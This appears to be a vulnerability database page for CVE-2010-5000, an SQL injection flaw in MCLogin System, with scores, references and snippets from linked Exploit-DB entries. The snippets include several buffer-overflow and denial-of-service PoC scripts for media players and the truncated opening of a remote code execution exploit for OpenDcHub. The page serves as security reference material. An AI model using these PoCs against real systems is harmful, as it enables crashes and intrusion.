CVE-2010-5000
Published 2011-11-02
Priority: P3 · 43 · high · CVSS 2.0: 7.5
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.05% (59.9th percentile)
SQL injection vulnerability in login/login_index.php in MCLogin System 1.1 and 1.2 allows remote attackers to execute arbitrary SQL commands via the myusername parameter (aka Username field) in a do_login action. NOTE: some of these details are obtained from third party information.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| joe_pieruccini | mclogin_system | — | — |
| joe_pieruccini | mclogin_system | — | — |
No detection rules found.
Exploit-DB
Microsoft Office PowerPoint 2010 - Invalid Pointer Reference
exploitdb·2016-09-21
CVE-2016-3357 Microsoft Office PowerPoint 2010 - Invalid Pointer Reference
---
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=866
The following crash was observed in Microsoft PowerPoint 2010 running under Windows 7 x86 with application verifier enabled.
File versions are:
mso.dll: 14.0.7166.5000
ppcore.dll: 14.0.7168.5000
Attached crashing file: 3525170180.ppt
Crashing context:
eax=1979aea0 ebx=1638bb50 ecx=1979aea0 edx=0024e340 esi=00000000 edi=00000000
eip=663088d8 esp=0024e330 ebp=0024e330 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206
ppcore!DllGetLCID+0x18205e:
663088d8 ff7110 push dword ptr [ecx+10h] ds:0023:1979aeb0=????????
Call Stack:
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Followin
Exploit-DB
Microsoft Office 2007 - 'OGL.dll' ValidateBitmapInfo Bounds Check Failure (MS15-097)
exploitdb·2015-09-16
CVE-2015-2510 Microsoft Office 2007 - 'OGL.dll' ValidateBitmapInfo Bounds Check Failure (MS15-097)
---
Source: https://code.google.com/p/google-security-research/issues/detail?id=469
The following crash was observed in Microsoft Office 2007 Excel with Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug did not reproduce in Office 2010 or 2013.
Attached files:
Original File: 3013413838_orig.xls
Crashing File: 3013413838_crash.xls
Minimized Crashing File: 3013413838_min.xls
The minimized crashing file shows a one bit delta from the original file at offset 0x139F. OffVis did not reveal anything unique about this offset in the minimized file.
File Versions:
Excel.exe: 12.0.6718.5000
OGL.dll: 12.0.6719.5000
oart.dll: 12.0.6683.5002
GD
Exploit-DB
Microsoft Office 2007 - BIFFRecord Length Use-After-Free
exploitdb·2015-09-16
CVE-2015-2520 Microsoft Office 2007 - BIFFRecord Length Use-After-Free
---
Source: https://code.google.com/p/google-security-research/issues/detail?id=464
The following crash was observed in Microsoft Office 2007 with Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug did not reproduce in Office 2010 or 2013.
Attached files:
Original File: 1105668828_orig.xls
Crashing File: 1105668828_crash.xls
Minimized Crashing File: 1105668828_min.xls
The minimized crashing file shows two one bit deltas from the original file. The first delta is at offset 0x1CF7E and the second is at offset 0x3A966. Both of these offsets appear to be BIFFRecord lengths.
File Versions:
Excel.exe: 12.0.6718.5000
MSO.dll: 12.0.6721.5000
Observed Crash:
eax=0000000
Exploit-DB
Microsoft Office 2007 - OLESSDirectyEntry.CreateTime Type Confusion
exploitdb·2015-09-16
CVE-2015-2521 Microsoft Office 2007 - OLESSDirectyEntry.CreateTime Type Confusion
---
Source: https://code.google.com/p/google-security-research/issues/detail?id=465
The following crash was observed in Microsoft Office 2007 with Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug did not reproduce in Office 2010 or 2013.
Attached files:
Original File: 1516065514_orig.xls
Crashing File: 1516065514_crash.xls
Minimized Crashing File: 1516065514_min.xls
The minimized crashing file shows a one bit delta from the original file at offset 0x49E8. OffVis reports this to be the CreateTime field of an OLESSDirectoryEntry structure.
File Versions:
Excel.exe: 12.0.6718.5000
MSO.dll: 12.0.6721.5000
Observed Crash:
When run without Applicati
Exploit-DB
Microsoft Office 2007 - MSPTLS Heap Index Integer Underflow (MS15-081)
exploitdb·2015-08-21
CVE-2015-2470 Microsoft Office 2007 - MSPTLS Heap Index Integer Underflow (MS15-081)
---
Source: https://code.google.com/p/google-security-research/issues/detail?id=431&can=1
The following crash was observed in Microsoft Office 2007 with Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug also reproduced in Office 2010 running on Windows 7 x86.
The crash is caused by a 1 bit delta from the original file at offset 0xA9B0. Standard tools did not identify anything significant about this offset in the minimized file.
Attached files:
Fuzzed minimized PoC: 3423415565_min.doc
Fuzzed non-minimized PoC: 3423415565_crash.doc
Original non-fuzzed file: 3423415565_orig.doc
DLL Versions:
wwlib.dll: 12.0.6720.5000
msptls.dll: 12.0.6682.5000
Exploit-DB
MediaMonkey 3.2.4.1304 - '.mp3' Buffer Overflow (PoC)
exploitdb·2010-12-04
---
# Exploit Title: Mediamonkey 3.2.4.1304 (mp3) Buffer Overflow Vulnerability PoC
# Date: 12/04/2010
# Author: 0v3r
# Software Link: http://www.mediamonkey.com/download/?dir=download
# Version: 3.2.4.1304
# Tested on: Windows XP SP3 EN
# CVE: N/A
#!/usr/bin/python
buff = "\x41" * 5000
try:
    f = open("exploit.mp3",'w')
    f.write(buff)
    f.close()
    print "[-] File created!\n"
except:
    print "[-] Error occured!\n"
Exploit-DB
Provj 5.1.5.5 - '.m3u' Buffer Overflow (PoC)
exploitdb·2010-11-30
---
# Exploit Title: Provj 5.1.5.5 (m3u) Buffer Overflow Vulnerability PoC
# Date: 11/30/2010
# Author: 0v3r
# Software Link: http://www.clubdjpro.com/files/provj5.exe
# Version: 5.1.5.5
# Tested on: Windows XP SP3 EN
# CVE: N/A
#!/usr/bin/python
buff = "\x41" * 5000
try:
    f = open("exploit.m3u",'w')
    f.write(buff)
    f.close()
    print "[-] File created!\n"
except:
    print "[-] Error occured!\n"
Exploit-DB
CombiWave Lite 4.0.1.4 - Denial of Service
exploitdb·2010-08-12
---
# Exploit Title: CombiWave Lite v4.0.1.4 (.mws) DoS
# Date: 12 / 8 / 2010
# Author: Oh Yaw Theng
# Software Link: http://www.topdownloads.net/software/combiwave-lite_2_219101.html?hl=&ia=0
# Version: v4.0.1.4
# Tested on: Windows XP SP 2
# CVE : N / A
#!/usr/bin/python
filename = "crash.mws"
junk = "\x41" * 5000
exploit = junk
textfile = open(filename,'w')
textfile.write(exploit)
textfile.close()
Exploit-DB
JaMP Player 4.2.2.0 - Denial of Service
exploitdb·2010-08-12
---
# Exploit Title: JaMP Player v4.2.2.0 (.m3u) DoS
# Date: 12 / 8 / 2010
# Author: Oh Yaw Theng
# Software Link: http://www.topdownloads.net/software/jamp-player_2_219088.html?hl=&ia=0
# Version: v4.2.2.0
# Tested on: Windows XP SP 2
# CVE : N / A
#!/usr/bin/python
filename = "crash.m3u"
junk = "\x41" * 5000
exploit = junk
textfile = open(filename,'w')
textfile.write(exploit)
textfile.close()
Exploit-DB
RightMark Audio Analyzer 6.2.3 - Denial of Service
exploitdb·2010-08-11
---
# Exploit Title: RightMark Audio Analyzer 6.2.3 (.sav , .sac) DoS
# Date: 12 / 8 / 2010
# Author: Oh Yaw Theng
# Software Link: http://www.topdownloads.net/software/rightmark-audio-analyzer_2_219034.html?hl=&ia=0
# Version: v6.2.3
# Tested on: Windows XP SP 2
# CVE : N / A
# Description : This is the latest version from the official website
#!/usr/bin/python
# Create the malicious .sav or .sac file and boom ! The program crashes ! DEADBEEF !
filename = "crash.sav"
junk = "\x41" * 5000
exploit = junk
textfile = open(filename,'w')
textfile.write(exploit)
textfile.close()
Exploit-DB
Home of MCLogin System - Authentication Bypass
exploitdb·2010-06-08
CVE-2010-5000 Home of MCLogin System - Authentication Bypass
---
Author: L0rd CrusAd3r
Published: 2010-06-08
Vendor url:-/www.maniacomputer.com
################################################################################################
Authentication Bypass in Home of MCLogin System 1,1
###################################### Author: L0rd CrusAd3r ######################################
Description:-
With MCLogin System your visitors can login or register a new account. It is written in PHP and the data is stored in a MySql database. Very easy to install or to customize to meet your needs. You can add it to your pages with just one link.
###################################################################################################
Vulnerability:-
*Authentication Bypass found
The Provided Sc
Exploit-DB
Media Player Classic 1.3.1774.0 - '.rm' Buffer Overflow (PoC)
exploitdb·2010-05-23
---
# Exploit Title: [ Media Player Classic - v 1.3.1774.0 (.rm file) buffer Overflow poc ]
# Date: [ 2010-05-22 ]
# Author: [ sniper ip ]
# Software Link: []
# Version: [ v 1.3.1774.0 ]
# Tested on: [ Windows xp2 , Windows xp3 , Windows 7 ]
# CVE : [if exists]
# Code : [
#!/usr/bin/perl
# |--------------------------------------------------------------------------------------------------| #
# | -- Media Player Classic - v 1.3.1774.0 (.rm file) buffer Overflow poc --| #
# | ---------- -- By : sniper ip # My Email : [email protected] ------------- | #
# |--------------------------------------------------------------------------------------------------| #
$buff="A" x 5000;
open (myfile , ">>sniper.rm");
print myfile $buff;
Exploit-DB
OpenDcHub 0.8.1 - Remote Code Execution
exploitdb·2010-03-31
CVE-2010-1147 OpenDcHub 0.8.1 - Remote Code Execution
---
#!/usr/bin/python
#
# OpenDcHub 0.8.1 Remote Code Execution Exploit
# Pierre Nogues - http://www.indahax.com
#
# Description:
# OpenDcHub is a direct connect hub for Linux
#
# OpenDcHub doesn't handle specially crafted MyINFO message which lead to a stack overflow.
#
# Affected versions :
# OpenDcHub 0.8.1
#
# Plateforms :
# Unix
#
# Usage :
# ./exploit.py
import socket
host = '192.168.1.9'
port = 5000
# must not contain \x36 \x53 \x00 bytes
# max shellcode size = 103 bytes use exploit v2 otherwise
No writeups or analysis indexed.
http://packetstormsecurity.org/1006-exploits/mcloginsystem-sql.txt
http://secunia.com/advisories/40122
http://securityreason.com/securityalert/8504
http://www.exploit-db.com/exploits/13766/
http://www.securityfocus.com/bid/40633